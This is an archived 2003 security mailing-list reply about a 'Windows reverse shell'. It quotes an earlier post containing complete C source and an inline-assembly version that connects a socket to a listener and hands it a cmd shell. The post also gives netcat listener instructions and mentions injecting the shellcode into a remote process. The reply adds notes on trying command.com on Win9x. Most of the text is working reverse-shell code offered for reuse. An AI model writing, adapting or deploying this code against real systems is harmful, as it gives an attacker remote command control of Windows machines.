Re[2]: Windows reverse Shell #2
From: NetNinja (netninja@hotmail.kg)
Date: 02/08/03
- Previous message: alias@securityfocus.com: "Yet another plaintext attack to ZIP encryption scheme."
- In reply to: s7726: "RE: Windows reverse Shell #2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 8 Feb 2003 13:11:26 +0600 From: NetNinja <netninja@hotmail.kg> To: "s7726" <s7726@yahoo.com>
Hello s7726,
Saturday, February 8, 2003, 12:09:45 AM, you wrote:
s> Could this work on a win9x machine? with some mods of course. namely command
s> rather than cmd, or is this strictly an NT/2k thing?
s> Thanx,
s> Gavin S.
s> -----Original Message-----
s> From: NetNinja [mailto:netninja@hotmail.kg]
s> Sent: Friday, February 07, 2003 4:45 AM
s> To: vuln-dev@securityfocus.com
s> Subject: Windows reverse Shell #2
s> Hello folks,
s> Thnx everyone for ur replies.
s> Today i found time to have a careful look at my reverse shell C source
s> code. THe problem that i had was very simple. In my C source i forgot to
s> initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's
s> code did initilize that struct, so big thnx to him. Another thing
s> u have to do is to cast socket handle returned from WSASocket call to
s> ptr type and pass it on to stdInput,stdOutput and stdErr of
s> STARTUPINFO struct.
s> That's it!
s> If anyone is interested in reverse cmd shell for windows i have
s> included both C and inline asm version. so have a look at them.
s> ---- C ---------------
s> /*
s> reverse cmd shell
s> Will spit back command shell on ur listening netcat
s> on ur localhost (127.0.0.2) port 55
s> set up ur netcat eg. nc -l -p 55 -vv
s> A*** (netninja@hotmail.kg)
s> http://netninja.to.kg
s> */
s> #include <winsock2.h>
s> #include <stdio.h>
s> #pragma comment(lib,"ws2_32")
s> void main(int argc, char *argv[])
s> {
s> WSADATA wsaData;
s> SOCKET hSocket;
s> STARTUPINFO si;
s> PROCESS_INFORMATION pi;
s> struct sockaddr_in adik_sin;
s> memset(&adik_sin,0,sizeof(adik_sin));
s> memset(&si,0,sizeof(si));
s> WSAStartup(MAKEWORD(2,0),&wsaData);
s> hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
s> adik_sin.sin_family = AF_INET;
s> adik_sin.sin_port = htons(55);
s> adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
s> connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
s> si.cb = sizeof(si);
s> si.dwFlags = STARTF_USESTDHANDLES;
s> si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
s> CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
s> ExitProcess(0);
s> }
s> ------[ end C ]--------------
s> ----[ inline ASM ]------
s> /*
s> reverse cmd shell
s> inline asm version
s> reverse cmd shell on address 127.0.0.1 port 55
s> A*** (netninja@hotmail.kg)
s> http://netninja.to.kg
s> */
s> #include <winsock2.h>
s> #include <stdio.h>
s> #pragma comment(lib,"ws2_32")
s> #define GP 0x77E7B332
s> #define LL 0x77E7D961
s> #define CreateProcessA [ebp-8]
s> #define ExitProcess [ebp-0ch]
s> #define WSASocketA [ebp-10h]
s> #define connect [ebp-14h]
s> #define CMD_STR [ebp-18h]
s> #define PORT 0x3700 //(htons(55)) here u gotta
s> reverse byte order 0x0037=3700
s> #define IPADDR 0x0100007F //
s> 7F000001//(inet_addr("127.0.0.1"))
s> void main(int argc, char *argv[])
s> {
s> char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
s> "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
s> char *i=ptr;
s> WSADATA wsaData;
s> WSAStartup(MAKEWORD(2,0),&wsaData); //initialize
s> winsock, this is not done below
s> // usually when u inject ur shellcode into remote process
s> // socket is already initialized
s> __asm
s> {
s> mov edi, i
s> dec edi
s> push ebp
s> mov ebp,esp
s> sub esp,0x20
s> mov ecx,ebp
s> sub ecx,4h
s> push ecx
s> load_lib:
s> inc edi
s> cmp byte ptr[edi],0
s> je done_loadin
s> push edi
s> mov eax, LL
s> call eax //LoadLibrary("Lib")
s> mov [ebp-4],eax //places lib handle into ebp-4
s> xor eax,eax
s> repne scasb
s> load_func:
s> cmp byte ptr[edi],0
s> je load_lib
s> push edi
s> mov ebx, dword ptr[ebp-4] //lib handle
s> push ebx
s> mov eax, GP
s> call eax
s> //GetProcAddress("Function")
s> pop ecx
s> sub ecx,4
s> mov dword ptr[ecx], eax
s> push ecx
s> xor eax,eax
s> repne scasb
s> jmp load_func
s> done_loadin:
s> xor eax,eax
s> inc edi
s> mov dword ptr[ebp-18h],edi
s> mov ecx,50 //make some
s> space for structs
s> push_em:
s> push eax
s> loop push_em
s> push 0x1
s> push 0x2
s> call WSASocketA
s> mov ebx, eax //copies sockethandle returned into
s> ebx
s> //ebp-20h
s> mov dword ptr[ebp-40h],0x2
s> //sockaddr_in
s> mov word ptr[ebp-3Eh],PORT
s> mov dword ptr[ebp-3Ch],IPADDR
s> //mov dword ptr[ebp-40h],process_information
s> mov dword ptr[ebp-94h],0x44 //sizeof startupinfo
s> mov dword ptr[ebp-68h],0x100 //dwFlags
s> mov dword ptr[ebp-5Ch],ebx //stdio
s> mov dword ptr[ebp-58h],ebx //stdout
s> mov dword ptr[ebp-54h],ebx //stderr
s> push 0x10
s> //sizeof sockaddr_in
s> lea edx, dword ptr[ebp-40h]
s> push edx
s> //ptr to sockaddr_in
s> push ebx
s> //socket handle
s> call connect
s> lea edx,dword ptr[ebp-50h]
s> push edx //push
s> proc_info
s> lea edx,dword ptr[ebp-94h]
s> push edx //push ptr
s> to startupinfo
s> xor edx,edx
s> push edx
s> push edx
s> push edx
s> inc edx
s> //inheritHandles = true
s> push edx
s> dec edx
s> push edx
s> push edx
s> mov eax,CMD_STR //ptr to "cmd" str
s> push eax
s> push edx
s> call CreateProcessA
s> push edx
s> call ExitProcess
s> }
s> }
s> ----[ end ]------
s> --
s> Best regards,
s> A*** (NetNinja) mailto:netninja@hotmail.kg
When i put command.com instead of cmd.exe as a parameter to
CreateProcess, reverse commandshell appeared on my
nc, however i failed to execute command and c the results. in addition
to that my nc stopped respondin and cpu usage jumped to 100% so i had to shut it down.
but u can try playing n pokin around with it. perhaps u will c different results.
-- Best regards, NetNinja mailto:netninja@hotmail.kg
- Next message: Paul Brereton: "Strange IE / Windows Behaviour"
- Previous message: alias@securityfocus.com: "Yet another plaintext attack to ZIP encryption scheme."
- In reply to: s7726: "RE: Windows reverse Shell #2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
